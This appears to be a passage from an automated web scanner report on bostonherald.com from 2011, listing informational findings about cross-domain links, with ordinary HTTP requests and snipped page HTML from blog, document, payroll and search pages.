The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /blogs/lifestyle/fork_lift/?p=3679 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://bostonherald.com/blogs/lifestyle/fork_lift/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<meta name="SUBSECTION" content="Blogs" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/tabbed.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/index.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/dropdown.css" media="screen,projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/subnavigation.css" media="screen,projection" />
   
   <link rel="stylesheet" type="text/css" href="/CSS/blogs.css" media="screen,projection" />
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<a href="/blogs/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/blogs/logoInsideBlogs.gif" alt="Blogs" /></a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.carfind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind" />Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.homefind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind" />Homefind</a>
...[SNIP]...
<a class="displayBlock" href="/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind" />Jobfind</a>
...[SNIP]...
<a href="/blogs/news/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
News &amp; Business Blogs</a>
...[SNIP]...
<a href="/blogs/sports/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Sports Blogs</a>
...[SNIP]...
<a href="/blogs/entertainment/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Entertainment Blogs</a>
...[SNIP]...
<a href="/blogs/lifestyle/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Lifestyle Blogs</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/xmlgrey.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift/"><img width="638" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_662x120.jpg" /></a>
...[SNIP]...
<span id="ucPreviewMsg_lblMessage" class="PreviewMsgText visualIEFloatFix">This evening at 5 p.m., the gourmet Portland, Maine-based pizzeria <a href="http://www.ottoportland.com">Otto Pizza</a>
...[SNIP]...
<p><img class="aligncenter" src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1170.snc4/154264_180150921996846_120515841293688_635022_7871232_n.jpg" alt="" width="582" height="440" /></p>
...[SNIP]...
<b><a href='http://topsy.com/trackback?url=http%3A%2F%2Fbostonherald.com%2Fblogs%2Flifestyle%2Ffork_lift%2F%3Fp%3D3679&amp;utm_source=pingback&amp;utm_campaign=L2' rel='external nofollow'>Twitter Trackbacks for BostonHerald.com - Blogs: Fork Lift.. Blog Archive .. What to Eat Tonight: Pizza from Harvard Square...s Latest Joint [bostonherald.com] on Topsy.com</a>
...[SNIP]...
<br />

<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/kerryByrne.gif" style="float:left; border: 1px #000 solid;">

<b>
...[SNIP]...
is career here
writing one of the nation's first newspaper beer columns. In his spare time,
he pens thoughtful Buffalo wing-themed haiku and publishes the critically
acclaimed <a href="http://ColdHardFootballFacts.com">ColdHardFootballFacts.com</a>. Kerry also writes for <a href="http://sportsillustrated.cnn.com/writers/kerry_byrne/archive/">SportsIllustrated.com</a>
...[SNIP]...
</div>

<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/donnaGoodison.gif?123=4234" style="float:left; border: 1px #000 solid;">
<b>
...[SNIP]...
</div>
       
<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/juliaRappaport.gif" style="float:left; border: 1px #000 solid">

<b>
...[SNIP]...
</b> is Assistant Arts and Lifestyle Editor at the Boston Herald,
where she writes the Sips column. An aspiring bon vivant, you can follow her
work and play at <a href="http://twitter.com/Julia_Rappaport">twitter.com/ Julia_Rappaport</a>
...[SNIP]...
<br>

<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/matSchaffer_phantom.gif" style="float:left; border: 1px #000 solid;">


<b>
...[SNIP]...
<a href=http://bostonherald.com/blogs/lifestyle/fork_lift/?feed=rss2><img src=http://cache.heraldinteractive.com/siteImages/icons/xml_sm.gif border=0></a>
...[SNIP]...

17.153. http://bostonherald.com/news/document.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/document.bg

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /news/document.bg?f=misc/100216housing.pdf&h=Massachusetts%20Housing%20Partnership&k=bh HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 27939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="News &amp; Opinion - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fdocument.bg%3Ff%3Dmisc%2F100216housing.pdf%26h%3DMassachusetts%2520Housing%2520Partnership%26k%3Dbh&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.154. http://bostonherald.com/projects/your_tax_dollars.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /projects/your_tax_dollars.bg

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /projects/your_tax_dollars.bg?src=Mefa HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title=" - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fprojects%2Fyour_tax_dollars.bg%3Fsrc%3DMefa&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<input type="button" value="Go" onClick="PayrollTable.setPageNumber(1);PayrollTable.getRows();"> <img id="ajax-loader" style="position: relative; top: 2px; display: none;" src="http://cache.heraldinteractive.com/images/siteImages/icons/ajax-loader.gif" />
<a id="clear_results" href="javascript: void(0);" onclick="PayrollTable.initialize();" style="display: none;" >
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.155. http://bostonherald.com/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /search/

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /search/?topic=Annette+Bening&position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 64237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Site Search - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/search/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DAnnette%2BBening%26position%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/track/inside_track/view.bg?articleid=1312550&format=comments">
...[SNIP]...
</a>&nbsp;&nbsp;

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniVideo.gif" alt="Video" style="margin:0 2px 0 0;"><a href="/track/inside_track/view.bg?articleid=1312550">
...[SNIP]...
</a>&nbsp;&nbsp;
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/track/inside_track/view.bg?articleid=1312550">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110126/stp/14023c_ltp010711fighter001.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1312018&format=comments">
...[SNIP]...
</a>&nbsp;&nbsp;

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1312018">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110125/stp/5895cb_kings012611.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110125/stp/bb27d3_41de89_ltpdvd20101205.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311966&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110125/stp/574dff_ltptfighter.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311847&format=comments">
...[SNIP]...
</a>&nbsp;&nbsp;

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311847">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110125/stp/a9de68_ctposcars.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311967&format=comments">
...[SNIP]...
</a>&nbsp;&nbsp;

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311967">
...[SNIP]...
</a>&nbsp;&nbsp;
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311967">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110125/stp/07f4a8_oscars012511.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311846&format=comments">
...[SNIP]...
</a>&nbsp;&nbsp;

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311846">
...[SNIP]...
</a>&nbsp;&nbsp;
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1311846">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110116/stp/96c1eb_finch_01172011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">


<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1310045">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110116/stp/63c6c4_ltpgold20110116.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1309915&format=comments">
...[SNIP]...
</a>&nbsp;&nbsp;

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1309915">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110116/stp/d8e594_bale_01172011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/entertainment/movies/general/view.bg?articleid=1309992&format=comments">
...[SNIP]...
<a id="trackMainImage_href" href="/track/inside_track/view.bg?articleid=1312550">
<img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/bcd2f7_jul_01282011.jpg" title="Harvard&rsquo;s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character." alt="Harvard&rsquo;s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character.">
</a>
...[SNIP]...
icleid=1312550" title="Moore&rsquo;s the merrier at Hasty festivities"
onclick="switchPhoto('198088');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198088" src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" title="Harvard&rsquo;s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character."
alt="Nancy Lane" style="margin:0 2px" />

</a>
...[SNIP]...
g?articleid=1312018" title="Hometown flicks garner several Oscar nods"
onclick="switchPhoto('197841');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197841" src="http://multimedia.heraldinteractive.com/images/20110126/stp/14023c_ltp010711fighter001.jpg" title="Mark Wahlberg as Micky Ward and Christian Bale as Dick Eckland in a scene from the Lowell-based flick, &lsquo;The Fighter,&rsquo; nominated for 7 Academy Awards, including best picture, and Bale for best supporting actor. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
67" title="&ldquo;King&rsquo;s Speech&rsquo; treated royally by Oscar"
onclick="switchPhoto('197722');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197722" src="http://multimedia.heraldinteractive.com/images/20110125/stp/a9de68_ctposcars.jpg" title="Oscar nominees include Christian Bale, seen with Mark Wahlberg, in &#x2018;The Fighter,&#x2019; Jennifer Lawrence in &#x2018;Winter&#x2019;s Bone,&#x2019; Colin Firth in &#x2018;The King&#x2019;s Speech,&#x2019; and Natalie Portman in &#x2018;Black Swan.&"
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
67" title="&ldquo;King&rsquo;s Speech&rsquo; treated royally by Oscar"
onclick="switchPhoto('197721');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
